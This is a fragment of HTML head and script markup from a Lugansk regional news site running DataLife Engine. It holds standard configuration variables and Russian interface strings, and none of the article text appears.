<link rel="canonical" href="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
